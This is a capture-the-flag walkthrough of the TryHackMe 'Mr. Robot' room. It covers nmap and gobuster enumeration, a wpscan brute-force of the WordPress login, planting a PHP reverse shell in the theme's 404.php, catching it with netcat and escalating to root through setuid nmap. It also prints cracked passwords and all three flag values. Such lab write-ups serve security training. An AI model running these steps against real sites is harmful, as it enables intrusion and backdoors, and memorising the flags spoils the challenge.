TryHackMe – Mr. Robot Capture The Flag (CTF) Challenge

5/5 - (2 votes)
TryHackMe – Mr. Robot Capture The Flag (CTF) Challenge

Have you seen the hacker-themed TV show Mr. Robot?

This article is a write-up of the walkthrough video for the CTF (Capture The Flag) style hacking challenge, Mr. Robot, on TryHackMe.

The challenge involves using standard pen-testing tools like nmap for enumeration and gobuster for brute-force directory sniffing. We will also make use of exploiting a certain bin command’s capability to run as root in order to carry out an attack to retrieve the last flag.

First, we connect to the VPN with OpenVPN, start up our target machine, and then note down our IPs.

export myIP=10.6.2.23
export targetIP=10.10.58.206

Enumeration

Let’s start scanning the target machine with nmap.

sudo nmap -Pn -sC -p- -O $targetIP
  • -Pn skips host discovery
  • -sC runs default script
  • -p- scans all ports
  • -O enables OS detection

Here’s the output:

┌──(tester㉿box)-[~]
└─$ sudo nmap -Pn -sC -p- -O $targetIP
[sudo] password for tester:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 12:16 EST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.58% done; ETC: 12:20 (0:03:52 remaining)
Stats: 0:13:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.25% done; ETC: 12:30 (0:01:27 remaining)
Stats: 0:13:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 91.88% done; ETC: 12:30 (0:01:13 remaining)
Nmap scan report for 10.10.15.66
Host is up (0.081s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
|_http-title: Site doesn't have a title (text/html).
443/tcp open   https
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose|specialized|storage-misc|WAP|broadband router|printer
Running (JUST GUESSING): Linux 3.X|5.X|4.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5.4 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 5.4 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 942.40 seconds

For further enumeration, let’s grab SecLists (a set of standard scanning wordlists), seclists from the git repo at: https://github.com/danielmiessler/SecLists.git. Next, we’ll run gobuster using big.txt as our wordlist from SecLists:

sudo gobuster dir -w /home/tester/hacking-tools/SecLists/Discovery/Web-Content/big.txt -u http://10.10.15.66
  • -w for wordlist
  • -u for url

The most interesting pages that jump out at me are the robots.txt and the /wp-admin. Let’s look at both of them to see what additional hints we can find.

We discover (no surprise!) a login page to WordPress at $targetIP/wp-login.php

Looking at $targetIP/robots.txt we find:

User-agent: *
fsocity.dic
Key-1-of-3.txt

Locating The First Key

If we navigate in our browser to $targetIP/fsocity.dic we download a dictionary file fsocity.dic. Browsing through the dictionary, we notice that it appears to be a password wordlist.

$targetIP/key-1-of-3.txt reveals our first of three keys:
073403c8a58a1f80d943455fb30724b9

Determining The Username

Now that we have a login page to WordPress, a password wordlist (fsociety.dic), all we need is a login username, and we will be ready to use gobuster to brute-force our way into the admin dashboard.

After inspecting the login page, we guess a few names from the Mr. Robot show: Elliot, Mr. Robot, Tyrell.

The errors from the login page reveal that Elliot is a valid username, but Mr. Robot and Tyrell are not. To test this out, we can also try misspelling Elliott (with two t’s) with a random password to see that the error returned says: invalid username.

Brute-Forcing The Password To WordPress Admin Dashboard

For this next attack we will use a specialized wordpress scanning tool:

wpscan --url 10.10.58.206 -P /home/tester/Downloads/fsocity.dic --usernames elliot
  • -P for password list

The scan successfully found Elliot’s password!

successfully found Elliot's password: ER28-0652

Uploading a Malicious Payload

After logging in to WordPress at $targetIP/wp-login.php we find a dashboard. Clicking on the left sidebar on Appearance/editor shows us a list of pages we can modify.

Let’s modify the 404.php error page to upload a malicious payload.

Spawning a Reverse Shell From WordPress

Beware the Backdoor! 🦋

For our malicious payload, we will use pentest monkey’s PHP revshell from GitHub.

The only thing we need to modify on the payload is our attack machine’s IP and listening port. After updating the payload, we can save it in the 404.php page.

Now to spawn a shell to a listener, all we need to do is load up the $targetIP/404.php page from our browser.

Let’s set up a listener with netcat:

sudo nc -lvnp 53

-lvnp

  • l = listen mode, for inbound connects
  • v = verbose
  • n = suppress name/port resolutions
  • p = port

We used port 53 for our listener port in this example.

Success! We just caught the reverse shell with netcat. It is an unstable shell, so we can do a few things to stabilize it. We can start by spawning a proper shell with Python.

python -c 'import pty;pty.spawn("/bin/bash");’

After backgrounding the shell with Ctrl+Z we enter the command:

stty raw -echo; fg

This command mirrors our terminal settings from the local machine to the netcat listener shell. It will also give us abilities such as tab completion and up for most recent commands.

The fg at the end of this command foregrounds the nc listener.

And now, when we load the 404.php webpage, we successfully catch the revshell!

Decrypting User Robot’s Password

Navigate to /home/robot

cat password.raw-md5

Output:

robot:c3fcd3d76192e4007dfb496cca67e13b

Found it! Now, all we need to do is to look this hash up on a website that hosts dictionaries of cracked hashes or crack it on our attack machine with a program like hashcat.

Using crackstation we can find the cleartext of our password!

abcdefghijklmnopqrstuvwxyz

Finding The Second Key

After switching over to user robot with our cracked password, we do a bit of enumeration and easily find the key.

su robot
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Privilege Escalation to Root

With the following command, we search for files in /bin/ that have the setuid bit set.

In other words, these types of files can run as root from a non-root account. GTFObins has a comprehensive list of leveraging certain binaries’ abilities to carry out privilege escalation.

For this box, we will find out that there are several options with the command:

find / -perm +6000 2>/dev/null | grep '/bin/'

We will move forward with Nmap. It has the ability to go into an interactive mode where it can send and receive commands as the root user.

We launch nmap in interactive mode with the command:

nmap --interactive

Then adding the prefix ! allows us to issue sudo commands. After locating the file for key 3, we can cat it out using ; to chain commands together.

nmap> !cd /root;cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

And now we have retrieved all 3 of Mr. Robot’s keys.